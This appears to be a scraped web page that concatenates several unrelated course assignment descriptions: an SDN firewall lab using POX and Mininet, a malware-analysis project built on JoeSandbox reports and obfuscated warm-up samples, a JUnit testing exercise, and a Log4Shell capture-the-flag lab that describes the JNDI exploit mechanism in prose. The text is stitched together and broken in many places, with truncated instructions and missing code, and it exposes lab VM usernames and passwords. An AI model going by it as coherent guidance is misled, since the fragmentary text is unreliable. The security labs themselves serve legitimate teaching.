xterm:In us1 xterm: press Control C to kill the serverIn Mininet Terminal: press Control C to stop tshark Go to the File => Open menu item, browse to the /tmp directory and select the pcap file that you saved using tshark. You will get a GUI that looks like the example packet capture. You will have a numbered list of all the captured packets with brief information consisting of source/destination, IP protocol, and a description of the packet. You can click on an individual packet and will get full details including the Layer 2 and Layer 3 packet headers, TCP/UDP/ICMP parameters for packets using those IP protocols, and the data contained in the packet.Example Packet Capture – Host us1 making web request to Host us2 Note the highlighted fields. You will be using the information from these fields to help build your firewall implementation and ruleset. Note the separate header information for TCP. This will also be the case for UDP packets.Also, examine the three-way handshake that is used for TCP. What do you expect to find for UDP? ICMP? Example TCP Three-Way Handshake Please examine the other packets that were captured to help you familiarize yourself with Wireshark. Using the information that you learned above in running Wireshark, you will be creating two files – one is a firewall configuration file that will specify different header parameters to match in order to allow or block certain traffic that will define the actions of the firewall and the second is the implementation code to create the OpenFlow Flow Modification objects that will create the firewall using the parameters given in the firewall configuration file. The configure.pol file is used by the firewall implementation code to specify the rules that the firewall will use to govern a connection. You do not need to code this first, but the format of the file is important to understand as your implementation code will need to use these items. The format of the file is a collection of lines that have the proper format:Rule Number, Action, Source MAC, Destination MAC, Source IP Network Address, Destination IP Network Address, Protocol, Source Port, Destination Port, Comment/Note The IP address of a particular host is defined inside the sdn-topology.py file. Special Notes About Firewall Configurations: Example Rules (included in the project files: 1,Block,-,-,10.0.0.1/32,10.0.1.0/24,6,-,80,Block 10.0.0.1 host from accessing a web server on the 10.0.1.0/24 network 2,Allow,-,-,10.0.0.1/32,10.0.1.125/32,6,-,80,Allow 10.0.0.1 host to access a web server on 10.0.1.125 overriding rule What do these rules do? The first rule basically blocks host hq1 (IP Address 10.0.0.1/32) from accessing a web server on any host on the us network (the subnet 10.0.1.0/24 network). The web server is running on the TCP IP Protocol (6) and uses TCP Port 80.The second rule overrides the initial rule to allow hq1 (IP Address 10.0.0.1/32) to access a web server running on us5 (IP Address 10.0.1.125/32)By definition – from the sdn-topology.py file:This class defines the Mininet Topology for the network used in this project. This network consists of the following hosts/networks: (THESE 5 SUBNETS ARE ALSO REFERRED TO AS THE CORPORATE NETWORKS)Headquarters Network (hq1-hq5). Subnet 10.0.0.0/24US Network (us1-us5). Subnet 10.0.1.0/24India Network (in1-in5). Subnet 10.0.20.0/24China Network (cn1-cn5). Subnet 10.0.30.0/24UK Network (uk1-uk5). Subnet 10.0.40.0/24 In Part 5, you will be given a set of firewall conditions that you will need to create the configure.pol needed for your submission. You may create temporary rulesets to help you complete Part 5b below. After reviewing the format of the configure.pol file, you will now code a generic implementation of a firewall that will use the values provided from the configuration file (passed to you as dictionary items). As it is provided, the firewall implementation code blocks no traffic. You must implement code that does the following:Please reference code examples in Appendix C, or you may refer to the POX API documentation (WARNING, this is long and the API is confusing).You will need to rewrite the rule = None to reference your Flow Modification object.Your code will go into a section that will repeat itself for every line in the firewall configuration file that is passed to it. The “rule” item that is added to the “rules” list is an OpenFlow Modification object. The process of injecting this rule into the POX controller is handled automatically for you in the start-firewall.py file.TIP: If your implementation code segment is more than 25-30 lines, you are making it too difficult. The POX API can provide many features that are not used in this project. The Appendix provides all of the information that you will need to code the project. Key Information:Use these to match traffic. Please note that all fields are strings and may contain a “-“ character.You will need to assume that all traffic is IPV4. It is acceptable to hardcode this value. Do not hardcode other values. Your code should be generic enough to handle any possible configuration. You will need to submit a configure.pol file to create policies that implement the following scenarios. You may implement your rules in any manner that you want, but it is recommended using this step as an opportunity to check your firewall code implementation. The purpose of these rules is to test your firewall and to help determine how traffic flows across the network (source vs destination, protocols, etc). DO NOT block all traffic by default and only allow traffic specified. You will lose many points because the firewall is open by default and only blocks the traffic that is specified. Firewall Rules for Summer 2025: (world) including the corporate networks. (two rules max) The China network is exempted from this rule because any overrides that you may do here will override aspects of Task 1 or Task 2 above. Note that when testing this rule, the IP address for host us1 may differ from the published topology. In this case, you want to address the particular hardware network address. You need to submit your copy of packetcapture.pcap, sdn-firewall.py and configure.pol from your project directory using the instructions from the Piazza Post “How to Submit / Zip Our Projects. To recap, zip up the two files using the following command, replacing gtlogin with your GT Login that you use to log into Canvas: zip gtlogin_sdn.zip packetcapture.pcap configure.pol sdn-firewall.pyThe key to properly zipping the project is to NOT zip up the directory. ZIP only the files you are included. You may also include an additional text file if you have comments, criticisms, or suggestions for improvement for this project. If you wish to provide this information, add it to your ZIP file with the name comments.txt. This is completely optional. Please check your submission after uploading. As usual, we do not accept resubmissions past the stated deadlines.Do not share the content of your sdn-firewall.py, configure.pol, or packetcapture.pcap with your fellow students, on Ed Discussions, or elsewhere publicly. You may share any new topologies, testing rulesets, or testing frameworks, as well as packet captures that do not address the requirements of Part 4b. RubricFor the Fall 2025 Semester, this project is worth a total of 100 points which is distributed in the following fashion: (There is a Youtube Video posted that depicts how to manually test)When you are developing your implementation or troubleshooting a firewall rule, you will want to test by hand. Unfortunately, this process is a bit difficult. 1,Block,-,-,10.0.0.1/32,10.0.1.0/24,6,-,80,Block 10.0.0.1 from accessing a web server on the10.0.1.0/32 networkStartup Procedure: This should start up POX, read in your rules, and start up an OpenFlow Controller. You will see something like this in your terminal window: This should start up mininet and load the topology. You should see the following: This will start the firewall and set the topology. You do not need to repeat Steps 1-3 unless you are done testing, need to restart the firewall, or need to restart mininet. When you are done with testing all of the rules you intend to use, type in “quit” in the mininet window, close all of the extraneous xterm windows generated, and run the mininet cleanup script ./cleanup.sh How to test connectivity between two hosts: Two windows should have popped up. You can always identify which xterm is which by running the command: ip address from the bash shell. This will give you the IP address for the xterm window, which will then let you discover which xterm window belongs to which host. This sets up the test server for us1 that will be listening on TCP port 80. The IP Address specified is always the IP address of the machine you are running it on. If you attempt to start the test-server on a machine that does not have the IP address that is specified in the command, you will get the following error: OSError: [Errno 99] Cannot assign requested address. o Step 6: In the xterm window for hq1 (which is the source host of the rule – remember that the source is always the client), type in the following command: This will start up a client that will connect to the TCP Port 80 on the server 10.0.1.1 (destination IP address) and will send a message string to the server. However, if the firewall is set to block this connection, you will never see the message pass on either of the client or the server.Examples of Connection Status: You may hit Control C to kill both the server and the client. Ensure that you do not have a Unspecified Prerequisite ErrorRepeat this process for every rule you wish to test. If you feel that after some initial testing that your implementation and ruleset is good, you may then proceed to using the automated test suite.The automated Test Suit was developed by a student in Summer 2021 (htian66) and has been updated to match the current version of this project. There are two test suites – one that tests your implementation with the configure.pol you created that matches the rules in Part 5, and the second that is a generic test of your implementation with a different topology and provided configuration policy. The first test suite will be the exact same one used in the autograder that will be used after you turn the project into Canvas.How to test normal cases: True indicates that a connection was made or was expected. False indicates the opposite condition. How to test alternate cases: (DO THIS FIRST AFTER PYTHON IMPLEMENTATION) True indicates that a connection was made or was expected. False indicates the opposite condition. “python.autoComplete.extraPaths”: [ “/home/mininet/pox/” ],Also, with Visual Studio code, it sometimes “recommends” _dl_type and other names prepended with a _. Note that this is incorrect – the name is dl_type, not _dl_type. This section contains a highly modified excerpt from the POX Manual (modified to remove extraneous features not used in this project and to provide clarifications). You should not need to use any other POX objects for this project. TA Comments are highlighted. Everything on these pages is important to complete the project.Excerpted and modified from: https://noxrepo.github.io/pox-doc/html/ Object Definitions: The main object used for this project is a “Flow Modification” object. This adds a rule to the OpenFlow controller that will affect a modification to the traffic flow based on priority, packet characteristic matchin, and an action that will be done to the traffic that is matched. IF AN OBJECT is matched, it is pulled from the network stream and will only be forwarded, modified, or redirected if you do an action. If you do not specify an action and the packet is matched, the packet will basically be dropped. The following class descriptor describes the contents of a flow modification object. You need to define the match, priority, and actions for the object.class ofp_flow_mod (ofp_header): def __init__ (self, **kw): ofp_header.__init__(self) self.header_type = OFPT_FLOW_MOD self.match = ofp_match()self.priority = OFP_DEFAULT_PRIORITY self.actions = [] OpenFlow defines a match structure – ofp_match – which enables you to define a set of headers for packets to match against. The match structure is defined in pox/OpenFlow/libOpenFlow_01.py in class ofp_match. Its attributes are derived from the members listed in the OpenFlow specification, so refer to that for more information, though they are summarized in the table below. You should create a match object and attach it to the flow modification object. Attribute Meaning dl_src Ethernet/MAC source address (Type of EthAddr) dl_dst Ethernet/MAC destination address (Type of EthAddr) dl_type Ethertype / length (e.g. 0x0800 = IPv4) (Type of Integer) nw_proto IP protocol (e.g., 6 = TCP) or lower 8 bits of ARP opcode (Type of integer) nw_src IP source NETWORK address (Type of String) nw_dst IP destination NETWORK address (Type of String) tp_src TCP/UDP source application port (Type of Integer) tp_dst TCP/UDP destination application port (Type of Integer) TA Note: (IMPORTANT_If you use VSCode or Pycharm, it may make the recommendation to use _dl_src and _dl_dst. These are not valid. Please use what is specified above. Attributes may be specified either on a match object or during its initialization. That is, the following are equivalent:matchobj = of.ofp_match(tp_src = 5, dl_type = 0x800,dl_dst = EthAddr(“01:02:03:04:05:06”))#.. or ..matchobj = of.ofp_match() matchobj.tp_src = 5 matchobj.dl_type = 0x800matchobj.dl_dst = EthAddr(“01:02:03:04:05:06”) IMPORTANT NOTE ABOUT IP ADDRESSES TA Note: What isn’t very clear by this documentation is that nw_* is expecting a network address.If you are calling out an IP Address like 10.0.1.1/32, it is an acceptable response to nw_*. However, if you are calling out a subnet like 10.0.1.0/24, the IP address portion of the response MUST BE the Network Address. From Wikipedia: IP addresses are described as consisting of two groups of bits in the address: the most significant bits are the network prefix, which identifies a whole network or subnet, and the least significant set forms the host identifier, which specifies a particular interface of a host on that network. This division is used as the basis of traffic routing between IP networks and for address allocation policies. (https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) Thus for a /24 network, the first 24 bits of the address comprises the network address. Thus, it would be 10.0.1.0. For a /25 network, there would be two networks in the 10.0.1.x space – a 10.0.1.0/25 and a 10.0.1.128/25. Your implementation code does NOT need to convert the given IP Address into a network – you can assume that any given address in a possible configuration file must be valid. However, your configure.pol file MUST be using the proper form if you are using a CIDR notation other than /32. Why would you do this? To reduce the number of rules needed. You may use this for the 5th rule from Part 6. Note that some fields have prerequisites. Basically this means that you can’t specify higher-layer fields without specifying the corresponding lower-layer fields also. For example, you can not create a match on a TCP port without also specifying that you wish to match TCP traffic. And in order to match TCP traffic, you must specify that you wish to match IP traffic. Thus, a match with only tp_dst=80, for example, is invalid. You must also specify nw_proto=6 (TCP), and dl_type=0x800 (IPv4). If you violate this, you should get the warning message ‘Fields ignored due to unspecified prerequisites‘. This question also presents itself as “What does the Fields ignored due to unspecified prerequisites warning mean?” Basically this means that you specified some higher-layer field without specifying the corresponding lower-layer fields also. For example, you may have tried to create a match in which you specified only tp_dst=80, intending to capture HTTP traffic. You can’t do this. To match TCP port 80, you must also specify that you intend to match TCP (nw_proto=6). And to match on the TCP protocol, you must also match on IPV4 type (dl_type=0x800). The final aspect needed to fully implement a flow modification object is the action. With this, you specify what you want done to a port. This can include forwarding, dropping, duplicating and redirecting, or modify the header parameters. For the purposes of this project, we are only dealing with forwarding of match traffic to its destination. But please note that for a Software Defined Network system, you can do all sorts of actions including round robin server, DDOS blocking, and many other possible options. OutputForward packets out of a physical or virtual port. Physical ports are referenced to by their integral value, while virtual ports have symbolic names. Physical ports should have port numbers less than 0xFF00. port (int) the output port for this packet. This is a bit misleading because it can confuse you with the application “port” for TCP/UDP. For openflow, this port represents the physical swith port that the host is plugged into. However, you do NOT know which physical port on which switch a host is connected to.Thus, you will need to use one of the virtual ports to define what you want to happen: Think carefully about the definitions given above for output actions. Remember that if you match a packet, no action (i.e., packet will be dropped) will be done unless you set an output action as the packet is pulled from the stream until it is resolved. The following example describes how to create a flow modification object including matching a destination IP Address, IP Type, and Destination IP Port, and setting an action that would redirect the matching packet out to physical switch port number 4 (note that you generally DO NO KNOW what physical switch port to use. Flow Modification Objects work as thus: For this project, you are making a flow modification object and action while using a matching pattern that can match any or all of the different parameters of the header. Make your implementation generic. Mininet is a network simulator that allows you to explore SDN techniques by allowing you to create a network topology including virtual switches, links, hosts/nodes, and controllers. It will also allow you to set the parameters for each of these virtual devices and will allow you to simulate real-world applications on the different hosts/nodes.The following code sets up a basic Mininet topology similar to what is used for this project:#!/usr/bin/python from mininet.topo import Topo from mininet.net import Mininetfrom mininet.node import CPULimitedHost, RemoteController from mininet.util import custom from mininet.link import TCLinkfrom mininet.cli import CLI class FirewallTopo(Topo):def __init__(self, cpu=.1, bw=10, delay=None, **params):super(FirewallTopo,self).__init__() # Host in link configuration hconfig = {‘cpu’: cpu}lconfig = {‘bw’: bw, ‘delay’: delay} # Create the firewall switch s1 = self.addSwitch(‘s1’) hq1 = self.addHost(‘hq1′,ip=’10.0.0.1′,mac=’00:00:00:00:00:1e’, **hconfig) self.addLink(s1,hq1) us1 = self.addHost( ‘us1′, ip=’10.0.1.1′, mac=’00:00:00:01:00:1e’, **hconfig) self.addLink(s1,us1) This code defines the following virtual objects:Useful Mininet Commands:
The assignment documentation and instructions are at the following link:Links to an external site. https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Links to an external site.You will be using the same VM you have been using from the earlier projects. If you need to download it again:VM Links to an external site.VM Username: malware VM Password: MachuPicchu_1450Download the VM early in case you run into slow downloads.VM Links to an external site.You need to complete one module for Phase I (50 points in total):The module for Phase I contains twenty multiple choice questions, with five choices (malware 1 through malware 5) per question. For each question, mark which of the malware samples exhibit the specified behavior. Each question is worth 2.5 points total (0.5 per malware).The naming of the submission file is not important, as long as it is JSON (“submission.json” is an example). You will have 5 attempts to submit your answers. If you attempt to make more submissions than the limit, your grade will be a ZERO for this Phase. You will be able to choose your best submission of the 5 manually in Gradescope, but this MUST be done BEFORE the project deadline. No late submissions or requests to update the submission will be accepted after the project deadline. Malware Analysis Phase IIThe assignment documentation and instructions are at the following link:Links to an external site. https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Links to an external site.You will be using the same VM you used to complete Phase I. Make sure to follow the instructions provided to prepare the VM.Static and Dynamic Malware Analysis: 50 pointsYou do not submit anything to this Canvas assignment, instead go over to Gradescope to submit your JSON file. Malware AnalysisProject GoalsAdditional Information:Accessing Project ResourcesSetup Instructions (0 points)⚠️ The file size is over 9 GB. Download it early—do not wait until the last minute!Table of contents Frequently Asked Questions (FAQ)General QuestionsQ: What permissions do I have for the VM? A: The malware user does not have administrative or sudo access to install or modify system packages. However, you can run pre-installed programs like Chrome, Wireshark, p7zip, py7zr, and tcpdump. Limited sudo permission provided for some tools like Wireshark and tcpdump.Q: How do I submit my answers for the Malware Analysis Project? A: The project has two phases. Submit your answers in Gradescope as follows:Phase 1Q: What does it mean to “drop” a file? A: “Drop” means to create (or attempt to create) a file. It does not mean to delete a file. We’re only concerned with files that are created or moved into specific directories by malware.Q: How do I understand the Joe Sandbox reports? A: Start with the Behavior section. It outlines the processes and highlights potentially malicious system calls. Research each behavior to determine what the malware is attempting to do.Q: Does the presence of an API call mean a behavior was attempted? A: Sometimes. If the API call is very generic, you may need context or multiple related calls to confirm a specific behavior. Think of it like reading a sentence—not just looking at individual words.Q: Does “attempt” mean the action has to succeed? A: No. Failed attempts still count as valid if the malware clearly initiated the action.Q: The autograder failed to start or timed out. What should I do? A: Contact the course staff and request a re-run of the autograder.Q: Gradescope rejected my submission for being incomplete. What’s the issue? A: You must provide answers for all five malware samples (20 behaviors each). Incomplete submissions will be rejected.Q: How should I format my JSON file? A: Follow the provided template exactly. Label behaviors as behavior01, behavior02, etc. Do not include comments or trailing commas.Q: How do I know if a behavior is true for a sample? A: Review the Behaviors and Signatures sections of the JoeSandbox report. If there’s evidence the action was attempted or executed, mark it as true. Otherwise, mark it false.Q: If a file is moved into a directory, does that count as “dropped”? A: Yes. Whether the file is created or moved, if malware causes it to appear in a target directory, it counts as dropped.Q: My JSON validates online but fails the autograder. Why? A: Double-check that:Q: What’s the difference between malware disabling security tools and tricking the user to do it? A: If the malware directly disables the tools, that counts. If it tricks the user into doing so, that falls under social engineering. Check for context in the report.Q: What if the file has a high reputation but exhibits suspicious behavior? A: Reputation scores can be misleading. Focus on observed behaviors, not reputation.Phase 2Q: I submitted flags, but they’re marked incorrect. I used my GTID—what gives? A: Make sure your GTID is exactly 9 digits and entered without angle brackets (< >).Q: Is CyberChef enough, or do I need other tools? A: CyberChef is great for decoding tasks. For file extraction, use command-line tools or dedicated GUI apps. You can also export raw files from CyberChef.Q: I keep seeing ‘Incorrect Phrase or Broken Encoding’ in CyberChef. Why? A: Many samples require multiple levels of encoding/decoding. If CyberChef fails, consider using a Python script to automate the steps.Q: Wireshark shows no useful traffic. What should I check? A: Ensure you’re capturing on the loopback interface. Then follow the TCP stream for interesting payloads or URLs.Q: curl gives a 404 error. What’s wrong? A: Double-check the endpoint and GTID format. Avoid using angle brackets unless explicitly instructed.Q: I keep getting the same file type when decompressing. Is that expected? A: Yes. This is often intentional to simulate onion-layered obfuscation. Keep peeling. A script can speed up this process.Q: I get “No Flag here. Incorrect Phrase.” What should I do? A: Recheck your phrase and encoding steps. Even minor formatting issues can invalidate your request. Extra Credit (TBD points):Analyze your malware samples (TBD points)You will investigate and label some of the more sophisticated malware behaviors from the five malware reports we provided. Use the included JoeSandbox reports to identify the malware’s behavior. Note that malware samples can share behaviors. Therefore, you should initially assume that each malware sample listed below exhibits every behavior. It is your job to determine whether that assumption is actually true.Hint: Look at the API/system call sequence under each process generated by the malware sample and determine what the malware is doing. Note that each JoeSandbox report may contain multiple processes with many different system call sequences. If any of the behaviors are seen (or attempted, but not necessarily successful) in any process in the report, then that malware has attempted that behavior. Of course, this approach is not entirely practical, as legitimate applications may perform the same actions in a benign manner. We are not concerned with differentiating the two in this assignment, but it is some food for thought.Clarification of ‘attempted’: We define “attempted” as a specific action that was clearly initiated but failed. By “specific” we mean that it is clear which action is being attempted. For instance, if a registry key is unambiguous (e.g., it is used only to set a startup option) but fails to change, that is considered an attempt. However, if a more generic registry key is involved—one that governs multiple settings—it would not count as an attempt, since the specific action is unclear.You will encounter that the same API functions can end with either a W or an A. This is standard practice in the Windows API. This document explains the difference (either one could be present in the wild): https://docs.microsoft.com/en-us/windows/desktop/intl/unicode-in-the-windows-apiFor each of the following questions, mark (true / false) whether the malware exhibits the identified behavior:DELIVERABLE: Your deliverable for this part of the assignment will be your final JSON file with your answers to the 20 questions.Download the ec submission template or use the JSON format below for your answers:{“sample1”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample2”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample3”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:}}The submitted answers should be in the following format (example only):{“sample1”: {“behavior01”: true,“behavior02”: false,“behavior03”: true,“behavior04”: true// …}}The name of the submission file does not matter, as long as it is in JSON format (e.g., submission.json). Incorrectly formatted JSON files or typos will count as one of your submission attempts.We have provided a validation script named json_validator.py that will check your file for proper formatting. To run the validator, use:python json_validator.py /path/to/solution.jsonRun this from the command line in the /home/malware directory. The validator will either return JSON file correctly formatted. or will list errors.Note: Using the validation script is not required, but it is highly recommended to prevent submission errors. This script works only for Phase 1 and the Extra Credit portion of the project.You will have 5 attempts to submit your answers. Improperly formatted JSON files will fail and still count as a submission. If you exceed the 5-attempt limit, any additional submissions will receive a grade of zero. You must complete all 60 behaviors (3 samples × 20 behaviors) using true or false (lowercase, unquoted). Incomplete submissions will also count as a failed attempt.You must manually select your best submission on Gradescope before the project deadline. No late submissions or resubmission requests will be accepted after the deadline. Please submit your JSON file to the Gradescope assignment: Project Malware Analysis – Extra Credit Phase 1 (50 points):Analyze your malware samples (50 points)You will investigate and label some of the more sophisticated malware behaviors from the five malware reports we provided. Use the included JoeSandbox reports to identify the malware’s behavior. Note that malware samples can share behaviors. Therefore, you should initially assume that each malware sample listed below exhibits every behavior. It is your job to determine whether that assumption is actually true.Hint: Look at the API/system call sequence under each process generated by the malware sample and determine what the malware is doing. Note that each JoeSandbox report may contain multiple processes with many different system call sequences. If any of the behaviors are seen (or attempted, but not necessarily successful) in any process in the report, then that malware has attempted that behavior. Of course, this approach is not entirely practical, as legitimate applications may perform the same actions in a benign manner. We are not concerned with differentiating the two in this assignment, but it is some food for thought.Clarification of ‘attempted’: We define “attempted” as a specific action that was clearly initiated but failed. By “specific” we mean that it is clear which action is being attempted. For instance, if a registry key is unambiguous (e.g., it is used only to set a startup option) but fails to change, that is considered an attempt. However, if a more generic registry key is involved—one that governs multiple settings—it would not count as an attempt, since the specific action is unclear.You will encounter that the same API functions can end with either a W or an A. This is standard practice in the Windows API. This document explains the difference (either one could be present in the wild): https://docs.microsoft.com/en-us/windows/desktop/intl/unicode-in-the-windows-apiFor each of the following questions, mark (true / false) whether the malware exhibits the identified behavior:DELIVERABLE: Your deliverable for this part of the assignment will be your final JSON file with your answers to the 20 questions.Download the submission template or use the JSON format below for your answers:{“sample1”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample2”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample3”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample4”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:},“sample5”: {“behavior01”: ,“behavior02”: ,“behavior03”: ,“behavior04”: ,“behavior05”: ,“behavior06”: ,“behavior07”: ,“behavior08”: ,“behavior09”: ,“behavior10”: ,“behavior11”: ,“behavior12”: ,“behavior13”: ,“behavior14”: ,“behavior15”: ,“behavior16”: ,“behavior17”: ,“behavior18”: ,“behavior19”: ,“behavior20”:}}The submitted answers should be in the following format (example only):{“sample1”: {“behavior01”: true,“behavior02”: false,“behavior03”: true,“behavior04”: true// …}}The name of the submission file does not matter, as long as it is in JSON format (e.g., submission.json). Incorrectly formatted JSON files or typos will count as one of your submission attempts.We have provided a validation script named json_validator.py that will check your file for proper formatting. To run the validator, use:python json_validator.py /path/to/solution.jsonRun this from the command line in the /home/malware directory. The validator will either return JSON file correctly formatted. or will list errors.Note: Using the validation script is not required, but it is highly recommended to prevent submission errors. This script works only for Phase 1 and the Extra Credit portion of the project.You will have 5 attempts to submit your answers. Improperly formatted JSON files will fail and still count as a submission. If you exceed the 5-attempt limit, any additional submissions will receive a grade of zero. You must complete all 100 behaviors (5 samples × 20 behaviors) using true or false (lowercase, unquoted). Incomplete submissions will also count as a failed attempt.You must manually select your best submission on Gradescope before the project deadline. No late submissions or resubmission requests will be accepted after the deadline. Please submit your JSON file to the Gradescope assignment: Project Malware Analysis – Phase I Phase 2 (50 points)OverviewFor this phase, we will be going over some of the basic concepts of malware analysis. None of the samples or scripts provided here are actually malicious, but they are provided as a way to understand the basic concepts of static and dynamic analysis.To do so, we will work with the samples by de-obfuscating and executing various samples as needed to understand how the samples function. The overall goal of each task will be to run the program or call the correct endpoint with the correct data to get your flag to send to the autograder.NOTE:When handling actual malware, additional due diligence is needed to ensure that you don’t accidentally infect your own machine or other machines on your network. The overall process for setting this environment up is outside the scope of this project, but you can find many helpful resources online along with CS6747: “Advanced Malware Analysis” if you wish to continue studies on your own. There are no malicious malware samples in the VM.Warm UpTo get started we will work through a number of simple scripts to understand some basics about de-obfuscation that will be helpful in later exercises. Malware authors will often obfuscate their payloads through various means to attempt to bypass IPS and AV systems, as well as to increase the effort required by analysts to contain and remediate a breach. Understanding some of these techniques will be important when we go to analyze some of the other samples in this project.These are some basic concepts of static analysis and are often used by malware authors and red team (penetration testers) operators in their work. All of these warm ups should provide a script for you to execute with your GTID and get a flag if you do so correctly. De-obfuscate the samples below and execute them to get your flag.Warm up exercise #1 (5%)We saw this sample come in earlier. It performs some simple encoding to execute the command. It looks like it spits out a flag, but we aren’t totally sure.Can you figure out how to get your flag?base64 -d
Goals: Preliminary Steps: NOTE: If extracting using Windows “Extract All…”, the Assignment6 directory may be nested in an additional directory. Drag it to the root directory. Instructions:To complete the assignment, perform the following tasks (after reading the Instructions and Notes in their entirety): ○ The method signature:○ See note 6 below for prohibited language constructs. ○ See note 6 below for prohibited language constructs. ○ See note 6 below for prohibited language constructs. public static int defectMethod4(boolean a, boolean b, int c, int d, int e) { int result = 0; if (a == b) { result = 1; } else { if ((c == 0) && ((d > 0) || (e < 0))) { result = 2; } else { result = 3; } } return result; } Create two JUnit test classes as follows, where each test case performs a single invocation of defectMethod4. /*-public static boolean defectMethod5(boolean a, boolean b) { int x = 3; int y = 1; if(a) { x += y; } else { y = y * x; } if(b) { y -= x; } else { y -= 1; } return ((x / y) >= 0);}*/ Fill in your answers in the method, as follows: Notes (important–make sure to read carefully): Submission:As soon as you submit, Gradescope will check your assignment by making sure that your files are present and in the correct location, compiling the code, running your tests, and performing some sanity checks on the outcome of such tests. If you pass all these checks, you will see a placeholder grade of 10 and a positive message from Gradescope. Otherwise, you will see a grade of 0 and an error message with some diagnostic information. Please note that a positive response from Gradescope only indicates that you passed the sanity checks and is meant to prevent a number of trivial errors. Please also note that if your submission does not pass the Gradescope checks, it will not be graded and will receive a 0, so please make sure to pay attention to the feedback you receive when you submit and keep in mind that you can resubmit as many times as you want before the deadline.[3] [1] Using any of these constructs would result in a zero for that task.[2] If using a Windows-based system, you may need to run java -cp “classes;lib/*” org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass. instead.[3] Although we tested the checker, it is possible that it might not handle correctly some corner cases. If you receive feedback that seems to be incorrect, please contact us on Ed Discussion.
Welcome!For this assignment you will exploit a real world vulnerability: Log4Shell.This will be a capture-the-flag style project where you will exploit a web application with a vulnerable version of log4j.A correct solution will output a ‘flag’ or ‘key’. There are 7 tasks to complete for 7 total flags. 6 required and 1 extra credit for a possible total of 102%. You will submit these flags in json format to Gradescope for grading in a file named project_log4shell.json.There is a template in the /home/log4j/Desktop/log4shell folder of the VM: project_log4shell.json. Copy this file and fill out the appropriate values for the flags found. Submit this file to Gradescope for immediate feedback with the autograder. Your grade will be reflected here in Canvas after the assignment has closed.You’ll use the same virtual machine you’ve been using. Links to an external site.If you need to redownload the VMLinks to an external site., do it early in case you run into slow downloads.The VM username and password is log4j and HangingGardens_600Go here for project details on the course Github Pages site:https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/Good luck and have fun!Necessary Disclaimer: THIS IS A REAL WORLD CRITICAL VULNERABILITY THAT MOST VENDORS HAVE PATCHED BUT THERE STILL COULD BE APPLICATIONS WITHOUT THE PATCH. THIS PROJECT IS FOR EDUCATIONAL PURPOSES ONLY. ATTEMPTING THIS ON REAL APPLICATIONS COULD PUT YOU IN VIOLATION OF THE LAW AND GEORGIA TECH IS NOT RESPONSIBLE. Log4ShellImportant Disclaimer:This project explores a real-world critical vulnerability (CVE-2021-44228). Any attempt to use these techniques on systems you do not own or have explicit permission to test is illegal and may result in criminal charges. Georgia Tech assumes no responsibility for misuse of this educational material.Learning Goals of this Project:Exploring a real world critical Java exploit in the Log4J logger: Log4ShellBy completing this project, students will:Technical BackgroundLog4J FrameworkLog4J is a widely-used open-source logging framework for Java applications that enables developers to:Java Naming and Directory Interface (JNDI)JNDI provides a standardized way for Java applications to:Lightweight Directory Access Protocol (LDAP)LDAP serves as a communication protocol for:The Vulnerability MechanismThe Log4Shell vulnerability exploits Log4J’s lookup feature, which performs string substitution using the syntax ${prefix:name}. For example:When Log4J processes a malicious JNDI lookup string, it connects to the attacker-controlled server and executes the retrieved code, leading to complete system compromise.Here is a visual of the Log4j exploit and how it is accomplished (you can zoom in if this is too small via ctrl + scroll): Required ResourcesEssential Reading MaterialsVideo ResourcesTechnical DocumentationPractical ExamplesTools and UtilitiesTable of contents Frequently Asked Question(s) (FAQ)Start With:Note: To ensure that the autograder accurately grades your submission, you should create/update your .JSON file in a text editor on the VM and submit from the VM. Do not use a word document program like LibreOffice or Word. The submission must be proper JSON format for the autograder to give credit.VM QuestionsCommon troubleshooting steps for VirtualBox:.Submission and GradescopeFlag Task Hints and QuestionsResolved 